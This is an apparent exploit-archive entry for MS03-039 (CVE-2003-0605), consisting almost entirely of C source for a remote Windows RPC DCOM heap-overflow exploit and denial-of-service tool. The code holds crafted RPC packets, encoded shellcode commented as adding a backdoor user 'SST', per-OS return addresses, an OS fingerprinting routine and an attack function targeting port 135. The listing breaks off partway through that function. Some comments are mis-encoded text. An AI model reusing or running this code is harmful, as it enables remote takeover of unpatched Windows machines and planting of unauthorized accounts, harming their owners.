Microsoft Windows - 'RPC2' Universal / Denial of Service (RPC3) (MS03-039)

EDB-ID:

109

CVE:

2003-0605

EDB Verified:

Author:

anonymous

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2003-10-09

Vulnerable App: 
/*  Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3)  */
/*                    Must be used with the associated shell                        */
/*                                                                                                  */
/*           This exploit works against unpatched systems (MS03-039)     */
/*             And cause a Denial of Service on patched systems (rpc3)     */


#include <stdio.h> 
#include <winsock2.h> 
#include <windows.h> 
#include <process.h> 
#include <string.h> 
#include <winbase.h> 

FILE *fp1; 
unsigned char bindstr[]={ 
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 

unsigned char request1[]={ 
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E 
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D 
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF 
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E 
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00}; 

unsigned char request2[]={ 
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 
,0x00,0x00,0x5C,0x00,0x5C,0x00}; 

unsigned char request3[]={ 
0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, 
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; 


unsigned char request4[]={ 
0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C 
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
}; 
void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask) 
{ 
for(int i=offset;i<(offset+lenght);i++) 
buf[i]=buf[i]^mask; 
} 
DWORD GETSTRCS(char *buf) 
{ 
DWORD cs=0; 
bool cld=false; 
for(unsigned int i=0;i<strlen(buf);i++) 
{ 
for(int z=0;z<13;z++) 
{ 
if(cs&1) cld=true; 
cs=cs>>1; 
if(cld) cs=cs|0x80000000; 
cld=false; 
} 
cs+=buf[i]; 
} 
return cs; 
} 

struct { 
DWORD seh; 
DWORD jmp; 
DWORD heap; 
char target[200]; 
} target_os[]= 
{ 
{ 
0x005Bfd2c, 
0x00081eeb, 
0x00180000, 
"WinXP" 
}, 
{ 
0x0095fd3c, 
0x00081eeb, 
0x00170000, 
"Win2K" 
} 
},v; 
unsigned char rawData1[]= 
"\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00" 
"\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00" 

"\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e" 
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" 
"\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" 
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2" 

//SHELLCODE From SAM ,THANKs ! 
//Add user SST,password is 557, 
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF" 

"\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D" 
"\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C" 
"\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99" 
"\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9" 
"\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6" 
"\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED" 
"\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE" 
"\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12" 
"\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED" 
"\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA" 
"\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB" 
"\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66" 
"\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81" 
"\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A" 
"\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3" 
"\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78" 
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" 
"\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99" 
"\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12" 
"\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99" 
"\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66" 

"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" 
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" 
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" 
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" 
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a" 
"\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" 
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" // 
"\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x77\xe0\x43\x00\x00\x10\x5c\x00" 
"\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26 
"\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os 


//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic 
//"Utilization of released heap structure and exploit of universal Heap overflow in windows ". 
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF" 
"\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14" 
"\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA" 
"\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF" 
"\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99" 
"\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1" 
"\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7" 
"\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99" 
"\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA" 
"\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9" 
"\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1" 
"\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8" 
"\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99" 
"\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9" 
"\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99" 
"\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12" 
"\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98" 
"\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99" 
"\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12" 
"\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12" 
"\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA" 
"\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD" 
"\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A" 
"\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2" 
"\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12" 
"\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31" 
"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66" 

"\x04\x04\x00\x70\x00\x04\x40" 
"\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00" 

"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71"; 


int version(char ip[16], int sock) 
{ 
//un poco de ettercap... 


unsigned char peer0_0[] = { 
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00 }; 


unsigned char peer0_1[] = { 
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x07, 0x00 }; 

/* 

unsigned char win2kvuln[] = { 
0x04, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00}; 
*/ 
fd_set fds2; 
unsigned char buf[1024]; 

int l; 
struct timeval tv2; 
FD_ZERO(&fds2); 
FD_SET(sock, &fds2); 
tv2.tv_sec = 6; 
tv2.tv_usec = 0; 

memset(buf,'\0',sizeof(buf)); 
send(sock,(char *)peer0_0,sizeof(peer0_0),0); 
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
{ 
l=recv (sock, (char *)buf, sizeof (buf),0); 
// for(i=0;i<52;i++) 
// { 
// if (i==28) i=i+4; 
// if (buf[i+32]!=win2kvuln) 
// { 
send(sock,(const char *)peer0_1,sizeof(peer0_1),0); 
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
{ 
memset(buf,'\0',sizeof(buf)); 
l=recv (sock, (char *)buf, sizeof (buf),0); 
if (l==32) 
{ 
closesocket(sock); 
return(1);//winxp 
} 
else 
{ 
#ifdef WIN32 
closesocket(sock); 
#else 
close(sock); 
#endif 
return(0);//win2kby default. Nt4 not added.. 
} 
} 
else return(-1); 
// } 


//} 
// closesocket(sock); 
// return(0);//win2k 
} 
closesocket(sock); 
return(-1); //Unknown 
} 
/********************************************************************************/ 
int attack(char *ip1,bool atack) 
{ 
unsigned char rawData[1036]; 
memcpy(rawData,rawData1,1036); 
unsigned char shellcode[50000]; 
char ip[200]; 
strcpy(ip,ip1); 
WSADATA WSAData; 
SOCKET sock; 
int len,len1; 
SOCKADDR_IN addr_in; 
short port=135; 
unsigned char buf1[50000]; 
unsigned char buf2[50000]; 

printf("%s\n",ip); 
//printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); 
//printf("Code by FlashSky,Flashsky xfocus org\n"); 
//printf("Welcome to our Site: http://www.xfocus.org\n"); 
//printf("Welcome to our Site: http://www.venustech.com.cn\n"); 
/* if(argc!=3) 
{ 
printf("%s targetIP targetOS\ntargets:\n",argv[0]); 
for(int i=0;i<sizeof(target_os)/sizeof(v);i++) 
printf("%d - %s\n",i,target_os.target); 
printf("\n%x\n",GETSTRCS(argv[1])); 
return; 
} 
*/ 
/* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) 
{ 
printf("WSAStartup error.Error:%d\n",WSAGetLastError()); 
return; 
} 
*/ 
addr_in.sin_family=AF_INET; 
addr_in.sin_port=htons(port); 
addr_in.sin_addr.S_un.S_addr=inet_addr(ip); 

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) 
{ 
printf("Socket failed.Error:%d\n",WSAGetLastError()); 
return 0; 
} 
len1=sizeof(request1); 

len=sizeof(rawData); 

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) 
{ 
printf("%s - connect failed\n",ip); 
return 0; 
} 

int vers=!version(ip,sock); 

// printf("%d\n",vers); 
// return; 
// int vers=1; 

FILE *fp; 

//ç¨â ¥¬ ¯ ª¥â 
// fp=fopen("shellcode","rb"); 
// fread(rawData,1,1036,fp); 
// fclose(fp); 
//⥯¥àì ­ã¦­® ááç¨â âì ­¥¯®á।á⢥­­® ¨á¯®«­ï¥¬ë© 襫«ª®¤! 

fp=fopen("bshell2","rb"); 
int sz=fread(shellcode,1,1024,fp); 
fclose(fp); 
// printf("%d\n",sz); 
for(int i=0;i<sz;i++) 
rawData[i+0x71]=shellcode[i]; 
// fp=fopen("badfile.exe","rb"); 
// unsigned int sz1=fread(shellcode,1,50000,fp); 
// fclose(fp); 
// for(i=0;i<sz1;i++) 
// rawData[i+0x240]=shellcode; 

// fp=fopen("pac","wb"); 
// fwrite(rawData,1,1036,fp); 
// fclose(fp); 

// return; 


//¥à¥¤ ⥬ ª ª ªá®à¨âì § ¯¨è¥¬  ¤à¥á ᢮¡®¤­®£® HEAP'a 
// DWORD heap=0x00180000; 
// int k=vers; 
// vers=1; 
// *(DWORD *)(rawData+0xae)=target_os[vers].heap; 
*(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; 
//’¥¯¥àì ­ã¦­® ¯à®ªá®à¨âì ­ è ª®¤, ¤«ï ⮣® çâ®¡ë ¯®«ãç¨âì ­ã¦­ë© ­  
XOR(rawData,0x71,sz,0x99); 
// XOR(rawData,0x240,sz1,0x99); 
//’ ª ¦¥ ­ ¬ ­ã¦­® § ¯¨á âì ­ã¦­ë© ­ ¬ SEH ¨ JMP 
DWORD seh=target_os[vers].seh; 
DWORD jmp=target_os[vers].jmp; 
*(DWORD *)(rawData+0x22a)=jmp; 
*(DWORD *)(rawData+0x22e)=seh; 
// *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); 
*(WORD *)(rawData+0x62)=sz; 


memcpy(buf2,request1,sizeof(request1)); 
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; 
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; 
memcpy(buf2+len1,request2,sizeof(request2)); 
len1=len1+sizeof(request2); 

memcpy(buf2+len1,rawData,sizeof(rawData)); 
len1=len1+sizeof(rawData); 

memcpy(buf2+len1,request3,sizeof(request3)); 
len1=len1+sizeof(request3); 
memcpy(buf2+len1,request4,sizeof(request4)); 
len1=len1+sizeof(request4); 
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; 

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; 
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; 
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; 
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; 
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; 
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; 
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; 

closesocket(sock); 
if(atack) 
{ 
sock=socket(2,1,0); 
WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); 

if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) 
{ 
printf("%s - send failed %d\n",ip,WSAGetLastError()); 
return 0; 
